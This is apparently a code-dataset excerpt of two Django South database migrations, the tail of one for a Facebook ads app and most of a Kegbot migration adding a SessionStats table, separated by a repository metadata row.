'end_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'lifetime_budget': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'start_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'updated_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True'})
},
'facebook_ads.adcreative': {
'Meta': {'ordering': "['creative_id']", 'object_name': 'AdCreative'},
'auto_update': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'body': ('django.db.models.fields.CharField', [], {'max_length': '135'}),
'count_current_adgroups': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'creative_id': ('django.db.models.fields.BigIntegerField', [], {'unique': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image_hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'image_url': ('django.db.models.fields.URLField', [], {'max_length': '100'}),
'link_url': ('django.db.models.fields.URLField', [], {'max_length': '1024'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'object_id': ('django.db.models.fields.BigIntegerField', [], {'null': 'True', 'blank': 'True'}),
'preview_url': ('django.db.models.fields.URLField', [], {'max_length': '100'}),
'related_fan_page': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'run_status': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True'}),
'story_id': ('django.db.models.fields.BigIntegerField', [], {'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '25'}),
'type': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'view_tag': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'facebook_ads.adgroup': {
'Meta': {'ordering': "['name']", 'object_name': 'AdGroup'},
'account': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'adgroups'", 'to': "orm['facebook_ads.AdAccount']"}),
'ad_id': ('django.db.models.fields.BigIntegerField', [], {'null': 'True'}),
'ad_status': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'adgroup_id': ('django.db.models.fields.BigIntegerField', [], {'unique': 'True'}),
'adgroup_status': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'bid_type': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'campaign': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'adgroups'", 'to': "orm['facebook_ads.AdCampaign']"}),
'creative': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'adgroups'", 'null': 'True', 'to': "orm['facebook_ads.AdCreative']"}),
'end_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'max_bid': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'start_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'targeting': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'adgroup'", 'unique': 'True', 'null': 'True', 'to': "orm['facebook_ads.Targeting']"}),
'updated_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True'})
},
'facebook_ads.adimage': {
'Meta': {'object_name': 'AdImage'},
'hash': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': "'32'"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'unique': 'True', 'max_length': "'100'"})
},
'facebook_ads.adstatistic': {
'Meta': {'ordering': "['statistic_id']", 'object_name': 'AdStatistic'},
'account': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'adstatistics'", 'null': 'True', 'to': "orm['facebook_ads.AdAccount']"}),
'actions': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'adgroup': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'adstatistics'", 'null': 'True', 'to': "orm['facebook_ads.AdGroup']"}),
'campaign': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'adstatistics'", 'null': 'True', 'to': "orm['facebook_ads.AdCampaign']"}),
'clicks': ('django.db.models.fields.IntegerField', [], {}),
'connections': ('django.db.models.fields.IntegerField', [], {}),
'cpc': ('django.db.models.fields.FloatField', [], {}),
'cpm': ('django.db.models.fields.FloatField', [], {}),
'ctr': ('django.db.models.fields.FloatField', [], {}),
'end_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'frequency': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'impressions': ('django.db.models.fields.IntegerField', [], {}),
'reach': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'social': ('django.db.models.fields.FloatField', [], {}),
'social_clicks': ('django.db.models.fields.IntegerField', [], {}),
'social_ctr': ('django.db.models.fields.FloatField', [], {}),
'social_impressions': ('django.db.models.fields.IntegerField', [], {}),
'social_reach': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'social_spent': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'social_unique_clicks': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'social_unique_impressions': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'spent': ('django.db.models.fields.FloatField', [], {}),
'start_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'statistic_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': "'100'"}),
'unique_clicks': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'unique_ctr': ('django.db.models.fields.FloatField', [], {}),
'unique_impressions': ('django.db.models.fields.IntegerField', [], {'null': 'True'})
},
'facebook_ads.aduser': {
'Meta': {'ordering': "['role']", 'unique_together': "(('account', 'uid'),)", 'object_name': 'AdUser'},
'account': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'users'", 'to': "orm['facebook_ads.AdAccount']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'permissions': ('django.db.models.fields.CommaSeparatedIntegerField', [], {'max_length': '20'}),
'role': ('django.db.models.fields.IntegerField', [], {}),
'uid': ('django.db.models.fields.BigIntegerField', [], {})
},
'facebook_ads.targeting': {
'Meta': {'object_name': 'Targeting'},
'age_max': ('facebook_ads.fields.PositiveSmallIntegerRangeField', [], {'null': 'True', 'blank': 'True'}),
'age_min': ('facebook_ads.fields.PositiveSmallIntegerRangeField', [], {'null': 'True', 'blank': 'True'}),
'broad_age': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'cities': ('annoying.fields.JSONField', [], {'null': 'True', 'blank': 'True'}),
'college_majors': ('facebook_ads.fields.CommaSeparatedCharField', [], {'max_length': '100'}),
'college_networks': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'college_years': ('django.db.models.fields.CommaSeparatedIntegerField', [], {'max_length': '100'}),
'connections': ('django.db.models.fields.CommaSeparatedIntegerField', [], {'max_length': '100'}),
'countries': ('facebook_ads.fields.CommaSeparatedCharField', [], {'max_length': '100', 'blank': 'True'}),
'education_statuses': ('facebook_ads.fields.CommaSeparatedCharField', [], {'max_length': '100'}),
'excluded_connections': ('annoying.fields.JSONField', [], {'null': 'True', 'blank': 'True'}),
'friends_of_connections': ('annoying.fields.JSONField', [], {'null': 'True', 'blank': 'True'}),
'genders': ('facebook_ads.fields.CommaSeparatedCharField', [], {'max_length': '5', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'interested_in': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'keywords': ('facebook_ads.fields.CommaSeparatedCharField', [], {'max_length': '4000'}),
'locales': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'radius': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'regions': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'relationship_statuses': ('django.db.models.fields.CommaSeparatedIntegerField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'user_adclusters': ('annoying.fields.JSONField', [], {'null': 'True', 'blank': 'True'}),
'user_event': ('django.db.models.fields.CommaSeparatedIntegerField', [], {'max_length': '100'}),
'work_networks': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'zips': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['facebook_ads']
|
bsd-3-clause
| 7,205,643,682,640,550,000 | 76.645161 | 183 | 0.567304 | false |
Alwnikrotikz/kegbot
|
pykeg/src/pykeg/core/migrations/0046_session_stats.py
|
1
|
26297
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'SessionStats'
db.create_table('core_sessionstats', (
('stats', self.gf('pykeg.core.jsonfield.JSONField')(default='{}')),
('site', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['core.KegbotSite'])),
('session', self.gf('django.db.models.fields.related.ForeignKey')(related_name='stats', unique=True, to=orm['core.DrinkingSession'])),
('date', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('revision', self.gf('django.db.models.fields.PositiveIntegerField')(default=0)),
))
db.send_create_signal('core', ['SessionStats'])
def backwards(self, orm):
# Deleting model 'SessionStats'
db.delete_table('core_sessionstats')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'beerdb.beerimage': {
'Meta': {'object_name': 'BeerImage'},
'added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'edited': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '36', 'primary_key': 'True'}),
'num_views': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'original_image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'revision': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'beerdb.beerstyle': {
'Meta': {'object_name': 'BeerStyle'},
'added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'edited': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '36', 'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'revision': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'beerdb.beertype': {
'Meta': {'object_name': 'BeerType'},
'abv': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'brewer': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['beerdb.Brewer']"}),
'calories_oz': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'carbs_oz': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'edited': ('django.db.models.fields.DateTimeField', [], {}),
'edition': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '36', 'primary_key': 'True'}),
'image': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'beers'", 'null': 'True', 'to': "orm['beerdb.BeerImage']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'original_gravity': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'revision': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'specific_gravity': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'style': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['beerdb.BeerStyle']"})
},
'beerdb.brewer': {
'Meta': {'object_name': 'Brewer'},
'added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'country': ('pykeg.core.fields.CountryField', [], {'default': "'USA'", 'max_length': '3'}),
'description': ('django.db.models.fields.TextField', [], {'default': "''", 'null': 'True', 'blank': 'True'}),
'edited': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '36', 'primary_key': 'True'}),
'image': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'brewers'", 'null': 'True', 'to': "orm['beerdb.BeerImage']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'origin_city': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '128', 'null': 'True', 'blank': 'True'}),
'origin_state': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '128', 'null': 'True', 'blank': 'True'}),
'production': ('django.db.models.fields.CharField', [], {'default': "'commercial'", 'max_length': '128'}),
'revision': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'url': ('django.db.models.fields.URLField', [], {'default': "''", 'max_length': '200', 'null': 'True', 'blank': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'core.authenticationtoken': {
'Meta': {'unique_together': "(('site', 'seqn', 'auth_device', 'token_value'),)", 'object_name': 'AuthenticationToken'},
'auth_device': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'expires': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'pin': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'seqn': ('django.db.models.fields.PositiveIntegerField', [], {}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'tokens'", 'to': "orm['core.KegbotSite']"}),
'token_value': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
'core.bac': {
'Meta': {'object_name': 'BAC'},
'bac': ('django.db.models.fields.FloatField', [], {}),
'drink': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.Drink']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'rectime': ('django.db.models.fields.DateTimeField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'core.config': {
'Meta': {'object_name': 'Config'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'configs'", 'to': "orm['core.KegbotSite']"}),
'value': ('django.db.models.fields.TextField', [], {})
},
'core.drink': {
'Meta': {'unique_together': "(('site', 'seqn'),)", 'object_name': 'Drink'},
'auth_token': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'duration': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'endtime': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'keg': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'drinks'", 'null': 'True', 'to': "orm['core.Keg']"}),
'seqn': ('django.db.models.fields.PositiveIntegerField', [], {}),
'session': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'drinks'", 'null': 'True', 'to': "orm['core.DrinkingSession']"}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'drinks'", 'to': "orm['core.KegbotSite']"}),
'starttime': ('django.db.models.fields.DateTimeField', [], {}),
'status': ('django.db.models.fields.CharField', [], {'default': "'valid'", 'max_length': '128'}),
'ticks': ('django.db.models.fields.PositiveIntegerField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'drinks'", 'null': 'True', 'to': "orm['auth.User']"}),
'volume_ml': ('django.db.models.fields.FloatField', [], {})
},
'core.drinkingsession': {
'Meta': {'unique_together': "(('site', 'seqn'),)", 'object_name': 'DrinkingSession'},
'endtime': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'seqn': ('django.db.models.fields.PositiveIntegerField', [], {}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sessions'", 'to': "orm['core.KegbotSite']"}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique_with': '()', 'max_length': '50', 'blank': 'True', 'null': 'True', 'populate_from': 'None', 'db_index': 'True'}),
'starttime': ('django.db.models.fields.DateTimeField', [], {}),
'volume_ml': ('django.db.models.fields.FloatField', [], {'default': '0'})
},
'core.keg': {
'Meta': {'unique_together': "(('site', 'seqn'),)", 'object_name': 'Keg'},
'description': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'enddate': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'notes': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'origcost': ('django.db.models.fields.FloatField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'seqn': ('django.db.models.fields.PositiveIntegerField', [], {}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'kegs'", 'to': "orm['core.KegbotSite']"}),
'size': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.KegSize']"}),
'startdate': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['beerdb.BeerType']"})
},
'core.kegbotsite': {
'Meta': {'object_name': 'KegbotSite'},
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'})
},
'core.kegsessionchunk': {
'Meta': {'unique_together': "(('session', 'keg'),)", 'object_name': 'KegSessionChunk'},
'endtime': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'keg': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'keg_session_chunks'", 'null': 'True', 'to': "orm['core.Keg']"}),
'session': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'keg_chunks'", 'to': "orm['core.DrinkingSession']"}),
'starttime': ('django.db.models.fields.DateTimeField', [], {}),
'volume_ml': ('django.db.models.fields.FloatField', [], {'default': '0'})
},
'core.kegsize': {
'Meta': {'object_name': 'KegSize'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'volume_ml': ('django.db.models.fields.FloatField', [], {})
},
'core.kegstats': {
'Meta': {'object_name': 'KegStats'},
'date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'keg': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'stats'", 'unique': 'True', 'to': "orm['core.Keg']"}),
'revision': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.KegbotSite']"}),
'stats': ('pykeg.core.jsonfield.JSONField', [], {'default': "'{}'"})
},
'core.kegtap': {
'Meta': {'object_name': 'KegTap'},
'current_keg': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.Keg']", 'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'max_tick_delta': ('django.db.models.fields.PositiveIntegerField', [], {'default': '100'}),
'meter_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'ml_per_tick': ('django.db.models.fields.FloatField', [], {'default': '0.45454545454545453'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'seqn': ('django.db.models.fields.PositiveIntegerField', [], {}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.KegbotSite']"}),
'temperature_sensor': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.ThermoSensor']", 'null': 'True', 'blank': 'True'})
},
'core.relaylog': {
'Meta': {'unique_together': "(('site', 'seqn'),)", 'object_name': 'RelayLog'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'seqn': ('django.db.models.fields.PositiveIntegerField', [], {}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'relaylogs'", 'to': "orm['core.KegbotSite']"}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'time': ('django.db.models.fields.DateTimeField', [], {})
},
'core.sessionchunk': {
'Meta': {'unique_together': "(('session', 'user', 'keg'),)", 'object_name': 'SessionChunk'},
'endtime': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'keg': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'session_chunks'", 'null': 'True', 'to': "orm['core.Keg']"}),
'session': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'chunks'", 'to': "orm['core.DrinkingSession']"}),
'starttime': ('django.db.models.fields.DateTimeField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'session_chunks'", 'null': 'True', 'to': "orm['auth.User']"}),
'volume_ml': ('django.db.models.fields.FloatField', [], {'default': '0'})
},
'core.sessionstats': {
'Meta': {'object_name': 'SessionStats'},
'date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'revision': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'session': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'stats'", 'unique': 'True', 'to': "orm['core.DrinkingSession']"}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.KegbotSite']"}),
'stats': ('pykeg.core.jsonfield.JSONField', [], {'default': "'{}'"})
},
'core.systemevent': {
'Meta': {'object_name': 'SystemEvent'},
'drink': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'events'", 'null': 'True', 'to': "orm['core.Drink']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'keg': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'events'", 'null': 'True', 'to': "orm['core.Keg']"}),
'kind': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'seqn': ('django.db.models.fields.PositiveIntegerField', [], {}),
'session': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'events'", 'null': 'True', 'to': "orm['core.DrinkingSession']"}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.KegbotSite']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'events'", 'null': 'True', 'to': "orm['auth.User']"}),
'when': ('django.db.models.fields.DateTimeField', [], {})
},
'core.thermolog': {
'Meta': {'unique_together': "(('site', 'seqn'),)", 'object_name': 'Thermolog'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'sensor': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.ThermoSensor']"}),
'seqn': ('django.db.models.fields.PositiveIntegerField', [], {}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'thermologs'", 'to': "orm['core.KegbotSite']"}),
'temp': ('django.db.models.fields.FloatField', [], {}),
'time': ('django.db.models.fields.DateTimeField', [], {})
},
'core.thermosensor': {
'Meta': {'unique_together': "(('site', 'seqn'),)", 'object_name': 'ThermoSensor'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nice_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'raw_name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'seqn': ('django.db.models.fields.PositiveIntegerField', [], {}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'thermosensors'", 'to': "orm['core.KegbotSite']"})
},
'core.thermosummarylog': {
'Meta': {'unique_together': "(('site', 'seqn'),)", 'object_name': 'ThermoSummaryLog'},
'date': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'max_temp': ('django.db.models.fields.FloatField', [], {}),
'mean_temp': ('django.db.models.fields.FloatField', [], {}),
'min_temp': ('django.db.models.fields.FloatField', [], {}),
'num_readings': ('django.db.models.fields.PositiveIntegerField', [], {}),
'period': ('django.db.models.fields.CharField', [], {'default': "'daily'", 'max_length': '64'}),
'sensor': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.ThermoSensor']"}),
'seqn': ('django.db.models.fields.PositiveIntegerField', [], {}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'thermosummarylogs'", 'to': "orm['core.KegbotSite']"})
},
'core.userpicture': {
'Meta': {'object_name': 'UserPicture'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'core.userprofile': {
'Meta': {'object_name': 'UserProfile'},
'gender': ('django.db.models.fields.CharField', [], {'max_length': '8'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mugshot': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.UserPicture']", 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'}),
'weight': ('django.db.models.fields.FloatField', [], {})
},
'core.usersessionchunk': {
'Meta': {'unique_together': "(('session', 'user'),)", 'object_name': 'UserSessionChunk'},
'endtime': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'session': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'user_chunks'", 'to': "orm['core.DrinkingSession']"}),
'starttime': ('django.db.models.fields.DateTimeField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'user_session_chunks'", 'null': 'True', 'to': "orm['auth.User']"}),
'volume_ml': ('django.db.models.fields.FloatField', [], {'default': '0'})
},
'core.userstats': {
'Meta': {'object_name': 'UserStats'},
'date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'revision': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.KegbotSite']"}),
